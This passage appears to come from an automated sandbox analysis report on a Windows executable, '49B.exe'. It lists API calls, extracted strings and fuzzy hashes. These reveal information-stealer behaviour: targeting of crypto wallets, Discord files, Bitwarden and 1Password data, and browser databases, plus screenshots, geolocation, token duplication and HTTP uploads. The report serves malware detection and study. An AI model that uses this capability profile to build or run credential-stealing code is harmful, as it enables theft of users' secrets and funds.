0x004016fb
0x004016fe
0x00401700
0x00401702
0x00401704
0x00401706
0x00401708
0x0040170e
0x00401710
0x00401711
0x00401712
0x00401781
0x00401781
0x00401783
0x00401787
0x00401789
0x00401789
0x0040178a
0x0040178b
0x00401791
0x00401793
0x00401793
0x00401785
0x00401785
0x00401715
0x00401718
0x00401719
0x0040171a
0x00000000
0x00000000
0x0040171d
0x0040171d
0x00401720
0x00401721
0x00401722
0x00401723
0x0040179a
0x0040179a
0x0040179c
0x0040179d
0x004017a0
0x00000000
0x00401728
0x00401728
0x0040172b
0x0040172e
0x00401730
0x00401732
0x00401734
0x00401736
0x00401738
0x00401738
0x0040173d
0x004017a1
0x004017a1
0x004017f9
0x004017f9
0x004017fd
0x004017fe
0x004017ff
0x00401801
0x00401803
0x00401805
0x00401807
0x00401808
0x0040180c
0x0040180c
0x0040180e
0x0040180e
0x004017a3
0x004017a4
0x004017a5
0x00000000
0x00000000
0x004017a8
0x004017eb
0x004017ed
0x004017f5
0x004017f6
0x004017f7
0x00000000
0x004017f7
0x004017aa
0x004017ab
0x004017ab
0x004017af
0x004017ba
0x004017bb
0x004017bb
0x004017bd
0x004017bf
0x004017c1
0x004017c2
0x004017c2
0x004017c4
0x004017c9
0x004017cb
0x004017cf
0x004017d1
0x004017d1
0x004017d2
0x004017d3
0x004017d9
0x004017db
0x004017db
0x004017cd
0x004017cd
0x00401740
0x00000000
0x00000000
0x00401742
0x00401744
0x00401747
0x00401748
0x0040174a
0x0040174c
0x0040174e
0x0040174e
0x00401750
0x00401751
0x00401754
0x00000000
0x00000000
0x00401756
0x00000000
0x00000000
0x00401758
0x00401759
0x0040175a
0x0040175b
0x00000000
0x00000000
0x0040175d
0x0040175e
0x00000000
0x00000000
0x00401760
0x00401762
0x00401766
0x00401767
0x0040176a
0x0040176b
0x0040176d
0x00401770
0x00401773
0x00401775
0x00401777
0x00401779
0x0040177b
0x00000000
0x0040177b
0x00401723
0x00401408
0x00401408
0x0040140f
0x00000000
0x00401413
0x00401413
0x00401413
0x00401416
0x00401417
0x00401418
0x00401419
0x00000000
0x0040141e
0x0040141e
0x00401421
0x00401423
0x00401427
0x00401429
0x0040142b
0x0040142e
0x0040142f
0x00401432
0x00401433
0x00401437
0x0040143a
0x0040143b
0x0040143e
0x0040143f
0x00401442
0x00401443
0x00401445
0x00401449
0x0040144f
0x00401452
0x00401454
0x00401458
0x0040145b
0x0040145e
0x00401462
0x00401469
0x0040146c
0x0040146e
0x00401471
0x00401471
0x00000000
0x00401471
0x00401419

APIs

#100.MSVBVM60(0040138C), ref: 0040127D

Memory Dump Source

Source File: 00000014.00000002.378120053.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.378109410.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.378158213.0000000000404000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.378167792.0000000000405000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID:
API String ID: 1341478452-0
Opcode ID: 9b3c68db70cb658cd46675113d1397903124ba5c29da548f47889c1b0315f0f2
Instruction ID: c5a21d82802158fab81438b3e418b8b1ced1607d7a22cba123809fe770ff09ea
Opcode Fuzzy Hash: 9b3c68db70cb658cd46675113d1397903124ba5c29da548f47889c1b0315f0f2
Instruction Fuzzy Hash: EF212C6088F3D25FD32353B44C654A57FB09C5362531E02DBD8C2DA0E3D29C184EC362

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: 49B.exe PID: 3092 Parent PID: 3472 49B.exeCOMMON

Executed Functions

Function 0042B4DB, Relevance: 179.7, APIs: 34, Strings: 65, Instructions: 6436threadsleepsynchronizationCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042B4E0
CoInitialize.OLE32(00000000), ref: 0042B4FC

Part of subcall function 00435146: OpenMutexA.KERNEL32 ref: 00435191
Part of subcall function 00435146: CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 0043519E

CoUninitialize.OLE32(?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00431A7C

Part of subcall function 00437E98: GetCurrentProcess.KERNEL32(00000008,?), ref: 00437EAA
Part of subcall function 00437E98: OpenProcessToken.ADVAPI32(00000000), ref: 00437EB1
Part of subcall function 00437E98: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00437ECB
Part of subcall function 00437E98: GetLastError.KERNEL32 ref: 00437ED5
Part of subcall function 00437E98: GlobalAlloc.KERNEL32(00000040,00000000), ref: 00437EE5
Part of subcall function 00437E98: GetTokenInformation.KERNELBASE(?,TokenIntegrityLevel,00000000,00000000,00000000), ref: 00437EF9
Part of subcall function 00437E98: ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 00437F0D
Part of subcall function 00437E98: GlobalFree.KERNEL32 ref: 00437F2D

GetUserDefaultLCID.KERNEL32(00001001,?,000000FF), ref: 0042B540
GetLocaleInfoA.KERNEL32(00000000), ref: 0042B547

Part of subcall function 00437F3D: __EH_prolog.LIBCMT ref: 00437F42
Part of subcall function 00437F3D: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00437FA6
Part of subcall function 00437F3D: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00437FC0
Part of subcall function 00437F3D: OpenProcess.KERNEL32(001FFFFF,00000000,?,?,?,00000000), ref: 00438034
Part of subcall function 00437F3D: OpenProcessToken.ADVAPI32(00000000,000F01FF,?,?,?,00000000), ref: 00438046
Part of subcall function 00437F3D: DuplicateTokenEx.ADVAPI32(?,000F01FF,00000000,00000002,00000001,?,?,?,00000000), ref: 00438061
Part of subcall function 00437F3D: CloseHandle.KERNEL32(?,?,?,00000000), ref: 0043806E
Part of subcall function 00437F3D: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,00000000), ref: 00438081

Part of subcall function 0041457B: __EH_prolog.LIBCMT ref: 00414580

Sleep.KERNEL32(00001388,0047835B), ref: 0042BAD5

Part of subcall function 00434910: __EH_prolog.LIBCMT ref: 00434915

GetUserNameA.ADVAPI32(?,00000101), ref: 0042BCB7

Part of subcall function 0043481D: __EH_prolog.LIBCMT ref: 00434822
Part of subcall function 0043481D: _strcat.LIBCMT ref: 0043487D

Sleep.KERNEL32(00007530), ref: 0042BE6E

Part of subcall function 00422891: __EH_prolog.LIBCMT ref: 00422896

_strlen.LIBCMT ref: 0042BF94
_strlen.LIBCMT ref: 0042BFAE
CreateThread.KERNELBASE(00000000,00000000,Function_00016455,00000000,00000000,00000000), ref: 0042C1F2
CreateThread.KERNELBASE(00000000,00000000,Function_0001AC93,00000000,00000000,00000000), ref: 0042C204
StrToIntA.SHLWAPI(00000000,00000000), ref: 0042C346

Part of subcall function 00434CBE: GetEnvironmentVariableA.KERNEL32(?,?,00000104,00000000), ref: 00434D0A

Part of subcall function 0043350F: __EH_prolog.LIBCMT ref: 00433514
Part of subcall function 0043350F: WinHttpOpen.WINHTTP(00000000,00000000,00000000,00000000,00000000,aD1rF3aM8r,0000000F,004875D0), ref: 00433552
Part of subcall function 0043350F: CreateFileA.KERNELBASE(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 00433576

Part of subcall function 00412593: _Deallocate.LIBCONCRT ref: 004125A2

Part of subcall function 004123B5: _Deallocate.LIBCONCRT ref: 004123CA

CreateThread.KERNEL32 ref: 0042C661
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0042C66A
CreateThread.KERNELBASE(00000000,00000000,Function_0001AB1E,00000000,00000000,00000000), ref: 0042C216

Part of subcall function 00431CDC: __EH_prolog.LIBCMT ref: 00431CE1

Part of subcall function 00428808: __EH_prolog.LIBCMT ref: 0042880D

Part of subcall function 00437D73: __EH_prolog.LIBCMT ref: 00437D78

Strings

L, xrefs: 0042B98B
aD1rF3aM8r, xrefs: 0042C670, 0042C6CB, 00430E14
KUV, xrefs: 0042B6B8
$, xrefs: 00430A5A
r, xrefs: 0042E9E7
25ef3d2ceb7c85368a843a6d0ff8291d , xrefs: 0042B822
latitude, xrefs: 0042D1EF, 0042D20F
Z, xrefs: 0042CE89
pzQcSfmwN3Ne4qWDyJ9BsZwNU7GZHpOvnJAE6R+bGrIOVU1J1SMZOw== , xrefs: 0042B80F
", xrefs: 004318B3
zip, xrefs: 0042D0F7, 0042D11F
S, xrefs: 0042DBEF
C, xrefs: 0042D39E
#!, xrefs: 0042B761
0, xrefs: 0042F850
POST, xrefs: 0042BE13
longitude, xrefs: 0042D262, 0042D282
=, xrefs: 0042F505
sqlite3.dll, xrefs: 0042C47A, 0042C53E, 0042E137, 00430F8F
bitwarden, xrefs: 0043063D
O, xrefs: 004318A3
L, xrefs: 0043100B
S, xrefs: 00430B62
8, xrefs: 0042FA1B
wallets\, xrefs: 0043016F
qSVdAbi/K2pP5PzejMhd4MMaG67HQMChyp0Mug== , xrefs: 0042B7FF
\data.json, xrefs: 0043064B
w, xrefs: 0042F6FE
., xrefs: 0042D034
|, xrefs: 0042E1E9
G, xrefs: 0042F37B
sjvw, xrefs: 0042BD7F
discord_files\, xrefs: 004303D8
k, xrefs: 0042DCC9
|, xrefs: 004315D0
s{|{, xrefs: 0042B5AF
u, xrefs: 0042D7CE
f, xrefs: 004310B7
', xrefs: 0042CF90
eL4nZ5eH2n, xrefs: 0042F9F6, 0042FB9A
s|, xrefs: 0042B5BB
T, xrefs: 0042F08F
cij, xrefs: 0042B668
\, xrefs: 0042DD97
(, xrefs: 0042C85B
O-r, xrefs: 0042BC82
screen.jpeg, xrefs: 004300CB
location, xrefs: 0042CB51, 0042CB59, 0042CC55, 0042CC62, 0042CD7C, 0042CD93, 0042CE68, 0042CE75, 0042CF68, 0042CF7F, 0042D016, 0042D023, 0042D0D7, 0042D0EE, 0042D112, 0042D1E6, 0042D206, 0042D259, 0042D279
p, xrefs: 0042CDA7
N, xrefs: 00431793
_id, xrefs: 004309F5
), xrefs: 0042CAB5
1password, xrefs: 00430759
.o\CK@GO@, xrefs: 0042B72A
Q, xrefs: 004316EA
], xrefs: 0042E723
GET, xrefs: 0042BA5D, 0042BAF2
name, xrefs: 0042DF8B
x, xrefs: 0042FBF6
%wPVVLDK, xrefs: 0042B578
jQ2zX9qC4e, xrefs: 0042D2D1, 00430CD3, 00430F4B
,gU^, xrefs: 0042B6AE
7, xrefs: 0042F1CF
/, xrefs: 0042CB6A
b, xrefs: 0042D4E5

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog$Create$OpenToken$ProcessThread$DeallocateFileGlobalInformationMutexNameSleepUser_strlen$AllocCloseConvertCurrentDefaultDuplicateEnvironmentErrorFirstFreeHandleHttpInfoInitializeLastLocaleModuleObjectProcess32SingleSnapshotStringToolhelp32UninitializeVariableWait_strcat
String ID: "$#!$$$%wPVVLDK$'$($)$,gU^$.$.o\CK@GO@$/$0$1password$25ef3d2ceb7c85368a843a6d0ff8291d $7$8$=$C$G$GET$KUV$L$L$N$O$O-r$POST$Q$S$S$T$Z$\$\data.json$]$_id$aD1rF3aM8r$b$bitwarden$cij$discord_files\$eL4nZ5eH2n$f$jQ2zX9qC4e$k$latitude$location$longitude$name$p$pzQcSfmwN3Ne4qWDyJ9BsZwNU7GZHpOvnJAE6R+bGrIOVU1J1SMZOw== $qSVdAbi/K2pP5PzejMhd4MMaG67HQMChyp0Mug== $r$screen.jpeg$sjvw$sqlite3.dll$s{|{$s|$u$w$wallets\$x$zip$|$|
API String ID: 376243089-3529155165
Opcode ID: 51abd240d406889785b42f698e2d8b6d9cdc798d328b8becbaf4358a51494ff3
Instruction ID: e94ce00122e4fa82846bea0862bbb1fd7594c71135c77926f87034a1b964e660
Opcode Fuzzy Hash: 51abd240d406889785b42f698e2d8b6d9cdc798d328b8becbaf4358a51494ff3
Instruction Fuzzy Hash: 1AD37D30D052689ACF25E7A5DC62BEDBB75AF25304F4040DEA449732C2DE786BC8CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040FCEA, Relevance: 21.6, APIs: 4, Strings: 8, Instructions: 607libraryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040FCEF

Part of subcall function 0041147C: __EH_prolog.LIBCMT ref: 00411481

Part of subcall function 00434CBE: GetEnvironmentVariableA.KERNEL32(?,?,00000104,00000000), ref: 00434D0A

Part of subcall function 0043481D: __EH_prolog.LIBCMT ref: 00434822
Part of subcall function 0043481D: _strcat.LIBCMT ref: 0043487D

LoadLibraryA.KERNELBASE(00000000,?), ref: 0040FD3B
SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 0040FD97

Part of subcall function 0040B9E2: __EH_prolog.LIBCMT ref: 0040B9E7
Part of subcall function 0040B9E2: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 0040BAFA
Part of subcall function 0040B9E2: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 0040BB01

Part of subcall function 004123B5: _Deallocate.LIBCONCRT ref: 004123CA

FreeLibrary.KERNEL32(00000000), ref: 004104FA

Strings

?wVL, xrefs: 004101F3
&nOURIT_, xrefs: 0041041F
KPMF, xrefs: 004101FA
Opera, xrefs: 0040FE1B
+cBX, xrefs: 0041044F
sqlite3.dll, xrefs: 0040FD19
_DYR, xrefs: 00410465
6~_EBYDO, xrefs: 0041018B

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog$FreeHeapLibrary$DeallocateEnvironmentFolderLoadPathProcessSpecialVariable_strcat
String ID: &nOURIT_$+cBX$6~_EBYDO$?wVL$KPMF$Opera$_DYR$sqlite3.dll
API String ID: 1239964785-2204884592
Opcode ID: f8097ad253ab4185b38ba514d16d5695546d2bbd389099c4a5f4c0d5bc3581aa
Instruction ID: 69342fa440fa4941ad3afa68567192f5fcd40b4a549efa36e205bdbcfc58bb3a
Opcode Fuzzy Hash: f8097ad253ab4185b38ba514d16d5695546d2bbd389099c4a5f4c0d5bc3581aa
Instruction Fuzzy Hash: D7428070D00218DFDF14DFA5C9557DEBBB1AF54308F1080AEE505B7282DB789A86CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040B9E2, Relevance: 7.8, APIs: 5, Instructions: 295memoryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040B9E7
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 0040BAFA
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 0040BB01
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?), ref: 0040BCC5
HeapFree.KERNEL32(00000000), ref: 0040BCCC

Part of subcall function 0040ADAE: __EH_prolog.LIBCMT ref: 0040ADB3

Part of subcall function 004123B5: _Deallocate.LIBCONCRT ref: 004123CA

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Heap$FreeH_prologProcess$Deallocate
String ID:
API String ID: 4229974167-0
Opcode ID: 2c5cf330897c6bd891a37f7b0fdfe3f7754754595a340d269faf9ec0303d7f40
Instruction ID: 7905d93e8dba5fa3abb4dc12eb7b1abbac3fc1000002746ed760146e37939467
Opcode Fuzzy Hash: 2c5cf330897c6bd891a37f7b0fdfe3f7754754595a340d269faf9ec0303d7f40
Instruction Fuzzy Hash: E1C12A30C00258DBCF14DFE5D991ADDBBB5AF18308F20816EE815B7292DB786E45CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0043E07C, Relevance: 7.6, APIs: 5, Instructions: 52COMMON

Download Yara Rule

APIs

FindClose.KERNEL32(000000FF,?,00413D61,?,7FFFFFFF,?,00000000,00413A66,?,?,?,00412BD2,00413A66,00000000,00413A66,?), ref: 0043E088
FindFirstFileExW.KERNELBASE(000000FF,00000001,?,00000000,00000000,00000000,?,?,?,?,00413D61,?,7FFFFFFF,?,00000000,00413A66), ref: 0043E0B8
GetLastError.KERNEL32(?,?,?,?,00413D61,?,7FFFFFFF,?,00000000,00413A66,?,?,?,00412BD2,00413A66,00000000), ref: 0043E0C5
FindFirstFileExW.KERNEL32(000000FF,00000000,?,00000000,00000000,00000000,?,?,?,?,00413D61,?,7FFFFFFF,?,00000000,00413A66), ref: 0043E0DF
GetLastError.KERNEL32(?,?,?,?,00413D61,?,7FFFFFFF,?,00000000,00413A66,?,?,?,00412BD2,00413A66,00000000), ref: 0043E0EC

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Find$ErrorFileFirstLast$Close
String ID:
API String ID: 569926201-0
Opcode ID: d5b34cdb4c872458f31f00cada39a68b4543b78154f39b56eb6973ad7fd03d4a
Instruction ID: 25badd273795c3e3d056de086acac74af5acf185015a6318ab1631a9ca9d4e3c
Opcode Fuzzy Hash: d5b34cdb4c872458f31f00cada39a68b4543b78154f39b56eb6973ad7fd03d4a
Instruction Fuzzy Hash: 48018031001269BBCB341FB6AC48C6B3F79EB89761B10452AFA64811E0DAB18861DA69

Uniqueness

Uniqueness Score: -1.00%

Function 00434E25, Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetUserNameA.ADVAPI32(?,?), ref: 00434E40

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 61f5ba5c05d30305611304f49ad6eb72e951543a1afcd66fa6b76d218acbb846
Instruction ID: cdb59cd0f94429d4d66104043b97c2d866e40b7933060b8ae6305b36cffb063e
Opcode Fuzzy Hash: 61f5ba5c05d30305611304f49ad6eb72e951543a1afcd66fa6b76d218acbb846
Instruction Fuzzy Hash: 67D0C97480810DEBCF50DB90D989AC9B7BCAB00308F0004A294C1E3140EAF4ABC99B91

Uniqueness

Uniqueness Score: -1.00%

Function 0043350F, Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 275fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00433514
WinHttpOpen.WINHTTP(00000000,00000000,00000000,00000000,00000000,aD1rF3aM8r,0000000F,004875D0), ref: 00433552
CreateFileA.KERNELBASE(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 00433576
WinHttpConnect.WINHTTP(?,00000000,000001BB,00000000,?,00000001,00000000,00000002,00000080,00000000), ref: 00433642

Part of subcall function 00437CFB: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000), ref: 00437D20
Part of subcall function 00437CFB: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000,?,?,00000000,00000000), ref: 00437D67

WinHttpConnect.WINHTTP(?,00000000,00000050,00000000,?,00000001,00000000,00000002,00000080,00000000), ref: 0043369C
WinHttpOpenRequest.WINHTTP(00000000,GET,00000000,00000000,00000000,00000000,00800100,?), ref: 00433714
WinHttpOpenRequest.WINHTTP(00000000,GET,00000000,00000000,00000000,00000000,00000100,?), ref: 0043377B
WinHttpSendRequest.WINHTTP(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004337AB
WinHttpReceiveResponse.WINHTTP(00000000,00000000), ref: 004337B7
WinHttpQueryDataAvailable.WINHTTP(00000000,?), ref: 004337CC
WinHttpReadData.WINHTTP(00000000,00000000,?,?), ref: 004337F7
WriteFile.KERNELBASE(?,00000000,?,3838244C,00000000), ref: 0043380C
GetLastError.KERNEL32 ref: 00433827
WinHttpCloseHandle.WINHTTP(00000000), ref: 0043382E
WinHttpCloseHandle.WINHTTP(00000000), ref: 00433838
CloseHandle.KERNEL32(?,00000001,00000000,00000002,00000080,00000000), ref: 00433841
WinHttpCloseHandle.WINHTTP(?), ref: 00433848

Strings

%99[^:]://%99[^/]%99[^], xrefs: 0043359C
aD1rF3aM8r, xrefs: 0043352D
L$88<?, xrefs: 004335C8
GET, xrefs: 0043370E, 00433775

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Http$CloseHandle$OpenRequest$ByteCharConnectDataFileMultiWide$AvailableCreateErrorH_prologLastQueryReadReceiveResponseSendWrite
String ID: %99[^:]://%99[^/]%99[^]$GET$L$88<?$aD1rF3aM8r
API String ID: 4006077129-2331371129
Opcode ID: a5772edb4f724a1657661cac29eea9d4b21b563af411d4a511cc64a57ce8b82c
Instruction ID: cdbeb45f4a8e2486f84ce951e1d343e2d7eb476a9a1a54b01020d679e700660f
Opcode Fuzzy Hash: a5772edb4f724a1657661cac29eea9d4b21b563af411d4a511cc64a57ce8b82c
Instruction Fuzzy Hash: 6DA16071900258AFDB11DFA4CD85BEEBBB8FF09304F5040AAE445A7241EB785E49CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00433115, Relevance: 31.8, APIs: 16, Strings: 2, Instructions: 303COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0043311A
WinHttpOpen.WINHTTP(00000000,00000000,00000000,00000000,00000000,?,0047835B,00000000), ref: 00433168
WinHttpConnect.WINHTTP(?,00000000,000001BB,00000000,?,?,?,?,0047835B,00000000), ref: 00433235

Part of subcall function 00437CFB: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000), ref: 00437D20
Part of subcall function 00437CFB: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000,?,?,00000000,00000000), ref: 00437D67

WinHttpConnect.WINHTTP(?,00000000,00000050,00000000,?,?,?,?,0047835B,00000000), ref: 00433292
WinHttpOpenRequest.WINHTTP(00000000,?,00000000,00000000,00000000,00000000,00800100,?,?,?,?,0047835B,00000000), ref: 00433314
WinHttpOpenRequest.WINHTTP(00000000,?,00000000,00000000,00000000,00000000,00000100,?,?,?,?,0047835B,00000000), ref: 00433385
_strlen.LIBCMT ref: 004333B2
_strlen.LIBCMT ref: 004333BC
WinHttpSendRequest.WINHTTP(00000000,Content-Type: text/plain; charset=UTF-8,000000FF,?,00000000,00000000,00000000,?,?,?,0047835B,00000000), ref: 004333D2
WinHttpReceiveResponse.WINHTTP(00000000,00000000,?,?,?,0047835B,00000000), ref: 004333E3
WinHttpQueryDataAvailable.WINHTTP(00000000,00000000,?,?,?,0047835B,00000000), ref: 004333FA
WinHttpReadData.WINHTTP(00000000,00000000,00000000,?,?,?,?,?,?,?,?,0047835B,00000000), ref: 00433425
GetLastError.KERNEL32(?,?,?,0047835B,00000000), ref: 004334DD
WinHttpCloseHandle.WINHTTP(00000000,?,?,?,0047835B,00000000), ref: 004334E7
WinHttpCloseHandle.WINHTTP(00000000,?,?,?,0047835B,00000000), ref: 004334EE
WinHttpCloseHandle.WINHTTP(?,?,?,?,0047835B,00000000), ref: 004334F8

Strings

%99[^:]://%99[^/]%99[^], xrefs: 0043318E
Content-Type: text/plain; charset=UTF-8, xrefs: 004333CC

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Http$CloseHandleOpenRequest$ByteCharConnectDataMultiWide_strlen$AvailableErrorH_prologLastQueryReadReceiveResponseSend
String ID: %99[^:]://%99[^/]%99[^]$Content-Type: text/plain; charset=UTF-8
API String ID: 1550182571-3818427525
Opcode ID: 35be63702e91de98fa5612f5559089dcdf83e06bfb898abcff3bf962fb5afb06
Instruction ID: 895cd0210418aeace856ce6e3d1a536679fccb76024a47a819fcc9431648de90
Opcode Fuzzy Hash: 35be63702e91de98fa5612f5559089dcdf83e06bfb898abcff3bf962fb5afb06
Instruction Fuzzy Hash: 73C16270901218EFDB15DFA5D985BEEBBB8FF09304F1040AAE805A7251DB785B48CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00437E98, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 65memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000008,?), ref: 00437EAA
OpenProcessToken.ADVAPI32(00000000), ref: 00437EB1
GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00437ECB
GetLastError.KERNEL32 ref: 00437ED5
GlobalAlloc.KERNEL32(00000040,00000000), ref: 00437EE5
GetTokenInformation.KERNELBASE(?,TokenIntegrityLevel,00000000,00000000,00000000), ref: 00437EF9
ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 00437F0D
GlobalFree.KERNEL32 ref: 00437F2D

Strings

S-1-5-18, xrefs: 00437F1A

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Token$GlobalInformationProcess$AllocConvertCurrentErrorFreeLastOpenString
String ID: S-1-5-18
API String ID: 857934279-4289277601
Opcode ID: 7fd0681fea19df5dba31833373d15ba6f3a64dcdbb5177e0ff1ce7ce6f7368be
Instruction ID: cead6bba60a10db50cb2fec9eb9fed126fdd553e9ef975a159cb314d7d00d788
Opcode Fuzzy Hash: 7fd0681fea19df5dba31833373d15ba6f3a64dcdbb5177e0ff1ce7ce6f7368be
Instruction Fuzzy Hash: 0C112E75A04104FBEB209BE1DC88BAF7FB9FF48755F104066E541E1050EB748A04DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00437B6B, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 122registryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00437B70
RegOpenKeyExA.KERNELBASE(80000002,?,00000000,00020119,?,75146490,00000000,00000000), ref: 00437BF4
RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000040), ref: 00437C43
RegCloseKey.ADVAPI32(?), ref: 00437C64

Strings

@, xrefs: 00437BAD

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseH_prologOpenQueryValue
String ID: @
API String ID: 1233982722-2766056989
Opcode ID: 53386c40ac066f8f8d8b6abacc0014bb134329521bf8cd18f1a257ba40c4bc1e
Instruction ID: c0dc45ffff6b1b7a749b91a2a6dfb793b50ec2884032d0ad78f50920ed034b1b
Opcode Fuzzy Hash: 53386c40ac066f8f8d8b6abacc0014bb134329521bf8cd18f1a257ba40c4bc1e
Instruction Fuzzy Hash: 0F518BB0D04258DFDB21CFA8C990AEEBBB9FF08304F14516EE489B7202D7744A85CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00409328, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040932D

Part of subcall function 0043E4D2: FormatMessageA.KERNELBASE(00001300,00000000,?,00000000,?,00000000,00000000), ref: 0043E4E8

LocalFree.KERNEL32(0000000F,unknown error,0000000D), ref: 00409373
LocalFree.KERNEL32(?), ref: 0040938C

Strings

unknown error, xrefs: 00409358

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: FreeLocal$FormatH_prologMessage
String ID: unknown error
API String ID: 252809769-3078798498
Opcode ID: 572824592474d938e5a9fe483c74f55a9139c3e6b95c6bece082f79a7298a8bd
Instruction ID: ee1a7a3d95b73de1b2718ec738487752ca2c9f84d8a493918ea11c27f78e478b
Opcode Fuzzy Hash: 572824592474d938e5a9fe483c74f55a9139c3e6b95c6bece082f79a7298a8bd
Instruction Fuzzy Hash: B7015A70A01219AFCB10EFA9C941AAEBBB4FF18304F10442FB885B6291D7789E04CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0043DE88, Relevance: 6.1, APIs: 4, Instructions: 114fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0043DCC0: CopyFileW.KERNELBASE(?,?,00000000,?,?,?,0043DFAA,?,0040B54C,00000000,?,?,?,?,0040B54C,?), ref: 0043DCD0

CreateFileW.KERNEL32(?,00000081,00000000,00000000,00000003,00000000,00000000,?,0040B54C,00000001,?,?,?,?,0040B54C,?), ref: 0043DED0
GetLastError.KERNEL32(?,?,0040B54C,?,?,?,?,?,?,00000000,?), ref: 0043DEDD

Part of subcall function 0043DCF5: CloseHandle.KERNEL32(000000FF,?,0043E3BD,?,?,?,00000080,?), ref: 0043DD01

CreateFileW.KERNEL32(0040B54C,00000082,00000000,00000000,00000003,00000000,00000000,?,?,0040B54C,?,?), ref: 0043DF0E
GetLastError.KERNEL32(?,?,0040B54C,?,?,?,?,?,?,00000000,?), ref: 0043DF1B

Memory Dump Source

